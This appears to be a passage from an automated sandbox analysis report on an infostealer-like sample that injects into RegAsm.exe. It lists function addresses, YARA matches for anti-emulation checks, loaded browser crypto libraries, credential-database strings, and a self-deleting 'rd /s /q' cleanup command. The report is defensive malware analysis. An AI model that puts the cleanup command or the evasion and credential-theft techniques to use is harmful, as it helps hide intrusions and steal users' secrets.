                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93A4D02_2_6C93A4D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8E64D02_2_6C8E64D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C92A4302_2_6C92A430
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9044202_2_6C904420
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8B84602_2_6C8B8460
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8945B02_2_6C8945B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C92E5F02_2_6C92E5F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C96A5E02_2_6C96A5E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E85502_2_6C9E8550
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F85402_2_6C8F8540
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A45402_2_6C9A4540
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9405702_2_6C940570
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9025602_2_6C902560
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C46D02_2_6C8C46D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FE6E02_2_6C8FE6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93E6E02_2_6C93E6E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FC6502_2_6C8FC650
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8CA7D02_2_6C8CA7D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9207002_2_6C920700
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8980902_2_6C898090
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97C0B02_2_6C97C0B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8B00B02_2_6C8B00B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9680102_2_6C968010
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C96C0002_2_6C96C000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8EE0702_2_6C8EE070
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A01E02_2_6C8A01E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9161302_2_6C916130
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9841302_2_6C984130
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9081402_2_6C908140
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C96E2B02_2_6C96E2B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9722A02_2_6C9722A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8BA2B02_2_6C8BA2B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA262C02_2_6CA262C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C96A2102_2_6C96A210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9782202_2_6C978220
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9382502_2_6C938250
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9282602_2_6C928260
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D23A02_2_6C8D23A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FE3B02_2_6C8FE3B0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8F43E02_2_6C8F43E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9123202_2_6C912320
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A83402_2_6C8A8340
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9363702_2_6C936370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E23702_2_6C9E2370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A23702_2_6C8A2370
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9BC3602_2_6C9BC360
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93FC802_2_6C93FC80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9DDCD02_2_6C9DDCD0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C961CE02_2_6C961CE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8B1C302_2_6C8B1C30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8A3C402_2_6C8A3C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9C9C402_2_6C9C9C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C893D802_2_6C893D80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9E9D902_2_6C9E9D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C971DC02_2_6C971DC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C903D002_2_6C903D00
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C3EC02_2_6C8C3EC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9ADE102_2_6C9ADE10
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA25E602_2_6CA25E60
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9FBE702_2_6C9FBE70
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8C1F902_2_6C8C1F90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9BDFC02_2_6C9BDFC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6CA23FC02_2_6CA23FC0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C94BFF02_2_6C94BFF0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9A3F302_2_6C9A3F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D5F202_2_6C8D5F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C895F302_2_6C895F30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9F7F202_2_6C9F7F20
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C93F8C02_2_6C93F8C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C97F8F02_2_6C97F8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8AD8E02_2_6C8AD8E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D38E02_2_6C8D38E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9FB8F02_2_6C9FB8F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8FD8102_2_6C8FD810
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9738402_2_6C973840
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9719902_2_6C971990
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8B19802_2_6C8B1980
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9399C02_2_6C9399C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C8D99D02_2_6C8D99D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9059F02_2_6C9059F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C9379F02_2_6C9379F0
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 00632356 appears 55 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 006C3DA8 appears 37 times
                      Source: C:\Users\user\Desktop\file.exeCode function: String function: 0063326A appears 45 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 004024FF appears 312 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8FC5E0 appears 35 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CA209D0 appears 282 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 0041820E appears 103 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8C3620 appears 74 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C8C9B10 appears 85 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CA2D930 appears 51 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6C9D9F30 appears 33 times
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 6CA2DAE0 appears 63 times
                      Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 0.2.file.exe.630000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: 00000002.00000002.2170451919.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation author = ditekSHen, description = Detects executables containing potential Windows Defender anti-emulation checks
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/25@1/2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C900300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,2_2_6C900300
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004111A4 _EH_prolog,CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,2_2_004111A4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041070C CoCreateInstance,SysAllocString,SysFreeString,_wtoi64,SysFreeString,SysFreeString,2_2_0041070C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199681720597[1].htmJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7712:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2178504934.000000006CA2F000.00000002.00000001.01000000.00000007.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, nss3[1].dll.2.dr, sqlx[1].dll.2.dr, nss3.dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                      Source: IIEBAF.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                      Source: RegAsm.exe, 00000002.00000002.2175231942.000000001B658000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2172015655.00000000156E7000.00000004.00000020.00020000.00000000.sdmp, sqlx[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                      Source: softokn3[1].dll.2.dr, softokn3.dll.2.drBinary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                      Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGDAAKJJDAAK" & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
